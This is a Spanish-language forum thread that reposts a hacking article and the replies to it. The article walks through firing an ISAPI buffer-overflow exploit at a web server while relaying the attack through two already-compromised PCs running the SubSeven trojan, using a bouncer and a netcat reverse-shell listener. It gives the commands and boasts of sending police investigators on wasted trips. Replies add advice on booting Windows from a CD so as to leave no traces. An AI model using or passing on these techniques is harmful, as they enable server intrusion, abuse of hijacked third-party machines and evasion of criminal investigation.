Utilizar Un Shell De Msdos Remoto Para Ocultarse Lanzando Exploits

**fermarlop** · 15-01-2004, 00:23

me resulto interezante el articulo que reproduzco a continuacion.
enlace :
http://www.cieloperros.da.ru/
http://www.terra.es/personal2/quickbasic/htm/shellremota.htm

Algunos usuarios de linux con nulo conocimiento de msdos (quizas crean que windows son solo ventanitas) piensan que es imposible hackear nada sin una shell de unix/linux ,que las shells remotas solo existen en ese mundo...

Bueno vamos a lanzar el exploit del ISAPI que ya conocemos con anonimato TOTAL usando ademas para despistar mas todavia 2 pcs distintos previamente hackeados y con el subseven metido.

En el 11.11.11.11 hacemos un bouncer con el subseven asi=

-en "input port" ------------>pon 80
-en "output host/ip" ponemos el OBJETIVO (www.hacked.com)
-en "output port" ---------->pon 80

Hecho esto nos desconectamos de ella.Esta maquina sera la encargada nada mas de ENVIAR el desbordamiento de buffer que provoca el xploit hacia la victima.

Ahora nos conectamos a nuestro otro subseven metido en 22.22.22.22

En esta maquina tendremos subido un NETCAT (nc.exe) tambien.

Abriremos un shell remoto con el comando del subseven: advanced/appredirect/enable app redirect

Ahora nos conectamos con el TELNET al puerto 23 de esa maquina 22.22.22.22 y...resultado=

Microsoft(R) Windows Millennium
(C)Copyright Microsoft Corp 1981-1999.

C:\>

Ahora TODO lo que hagamos es como si fuera nuestra propia maquina,por ello ahora dejaremos escuchando ahi el NETCAT poniendo...: nc -l -p 100 -vv y nos devolvera el mensaje que ya conocemos:

listening on [any] 100 ...

Pues ya tenemos todo preparado... Solo falta ejecutar el xploit en NUESTRO PC de esta forma:

xploit 11.11.11.11 80 22.22.22.22 100

Hemos enviado el desbordamiento de buffer A TRAVES del 11.11.11.11 hacia www.hacked.com especificando que la vuelta tiene que ir hacia 22.22.22.22, puerto 100... ;-) En la ventana de nuestro TELNET,tenemos ya un shell de www.hacked.com.

Cuando los estimados agentes de Delitos Informaticos investiguen los logs se frotaran las manos pensando,bien...tenemos 2 ips distintas..seguramente el jaker es la que ha lanzado el ataque..o el que lo ha recibido...pero lamentablemente haran 2 viajes en balde.

Hacedles un favor y que las dos maquinas esten bien lejos una de la otra...y en sitios chulos,mandadlos a Canarias y a Galicia p.ejm ;-)

**KIFO** · 15-01-2004, 09:40

Muy interesante.
Gracias por la info fermalop.

Saludos,

**juanma.m.d** · 15-01-2004, 18:52

mmm si parece interesante thx fermalop

**gondar_f** · 15-01-2004, 20:37

Pues no estoy de acuerdo con un par de cosillas del articulo, primero resulta que los comandos que utilizan no son para nada de MSDOS, sino que son llamadas a programas Win32 de consola, ademas en los NT no existe nada de MSDOS, tiene un shell parecido, pero es totalmente de 32 bits y puro Win32, en los Win9x si que hay un MSDOS pero solo se utiliza para ejecutar software de este sistema y como cargador de arranque (realmente no son mas que evoluciones del Win 3.1).
Por lo demas el articulo esta muy bien, gracias fermarlop.
Lo que no comento es lo de porque se menciona Galicia, que me da mala espina, y si hay que hablar todos tenemos boca.
Un Saludo

**fermarlop** · 17-01-2004, 14:56

Escrito originalmente por gondar_f
Pues no estoy de acuerdo con un par de cosillas del articulo, primero resulta que los comandos que utilizan no son para nada de MSDOS, sino que son llamadas a programas Win32 de consola, ademas en los NT no existe nada de MSDOS, tiene un shell parecido, pero es totalmente de 32 bits y puro Win32, en los Win9x si que hay un MSDOS pero solo se utiliza para ejecutar software de este sistema y como cargador de arranque (realmente no son mas que evoluciones del Win 3.1).
Por lo demas el articulo esta muy bien, gracias fermarlop.
Lo que no comento es lo de porque se menciona Galicia, que me da mala espina, y si hay que hablar todos tenemos boca.
Un Saludo

a mi me funciono con un xp ruleando en un CD previamente compilado con Barts PE Builder 3.0.22(
http://www.mirror.ac.uk/sites/www.nu2.nu/nu2files/pebuilder3026.zip )
las intentonas ovbiamente fueron aun servidor propio.

**-=:PüNi§hËr:** · 23-01-2004, 20:40

Vale esta wena la info. y si dices que la provaste y te resulto seguro que es buena solo unas preguntas
1.- ¿esto se puede hacer con cualquier win?
2.- ¿Quien fue el diseñador de ese magnifico diseño?
sale salu2 xD

**gondar_f** · 23-01-2004, 23:26

Yo no dije que no fuencionar en XP, todo lo contrario, muchos de esos comandos son de los NT (XP=NT6), aunque algunos tambien estaban disponibles en los 9x. Ademas el XP sigue pudiento ejecutar cierta cantidad de software para DOS, por emulacion, siempre que no utilize el modo real, sino el modo protegido. Lo que dije es que eso no es MSDOS, sino una linea de comandos (al estilo del xterm de linux), y que en Windows hay dos tipos de ejecutables, los de ventaja y los de consola (su apariencia es semejante a los del antiguo MSDOS), pero estos ultimos son completamente de 32 bits, y si no usan ventanas es porque no les hace falta, todo lo contrario, probablemente les restara opciones y los complicara de mala manera, ademas que que se obligaria a que fueran .exe, cuando muchos no lo son, sino que son llamadas a dll.
Un Saludo

**THE_CROW** · 23-01-2004, 23:49

El del diseño es noseque Pablo. Un controvertido "internauta".

**fermarlop** · 24-01-2004, 16:27

Escrito originalmente por -=:PüNi§hËr:
Vale esta wena la info. y si dices que la provaste y te resulto seguro que es buena solo unas preguntas
1.- ¿esto se puede hacer con cualquier win?
2.- ¿Quien fue el diseñador de ese magnifico diseño?
sale salu2 xD

EN EL LÍMITE DE LA LEY Juan Pablo Corujo, joven detenido en Redondela por hurtar datos de la Agencia Tributaria
Juan Pablo Corujo, un vendedor de libros en paro, de 29 años, se llevó hace unos días el susto de su vida cuando cuatro policías irrumpieron en su casa, en una aldea de Redondela (Pontevedra), y le espetaron: «¿Has entrado en la Intranet?». La Unidad de Delitos Informáticos temía que el «hacker» hubiese invadido la red interna de Hacienda y luego divulgado los datos de los contribuyentes. Y es que el 19 de mayo bajó a su ordenador la base de datos de clientes de Letras del Tesoro. «No me interesó y las borré. El servidor estaba desprotegido porque los funcionarios eran unos ineptos», dijo al juez, a quien demostró que «cualquier pringadillo puede hacer lo mismo».

http://www.cieloperros.da.ru/
el enlace esta en esa paggina sobre las noticias de su detencion-

otra cosa:
Barts PE Builder 3.0.22 (http://www.mirror.ac.uk/sites/www.nu2.nu/nu2files/pebuilder3026.zip)
es una utilidad que te permite crear un ISO para que quemes en un CD y puedas ejecutar tu XP-2000-NETSERVER desde un CD.esta utilidad me permite usar XP sin disco rigido lo que conviene a la hora de no dejar rastros igual que un knoppix-

lo de los comandos que habla gondar_f :
desde que salio MSDOS existe telnet ftp etc lo que habla mas arriba si a eso te refieres, de:
En el 11.11.11.11 hacemos un bouncer con el subseven asi=

-en "input port" ------------>pon 80
-en "output host/ip" ponemos el OBJETIVO (www.hacked.com)
-en "output port" ---------->pon 80

O netcat son programas que rulan en otras maquinas que desde MSDOS puedes conectarte con telnet .
lo unico que usas desde un MSDOS en la maquina local (la que te encuentras) es telnet. las otras maquinas son remotas.

pagina con comandos MSDOS:
http://www.computerhope.com/msdos.htm#02

Utilizar Un Shell De Msdos Remoto Para Ocultarse Lanzando Exploits

Herramientas

Visualizar

Temas similares

crear un .exe con estos archivos para msdos

Nuevo Framework para Exploits

Cliente telnet para msdos

Para poder utilizar el Office

Ocultarse!!

Marcadores

Marcadores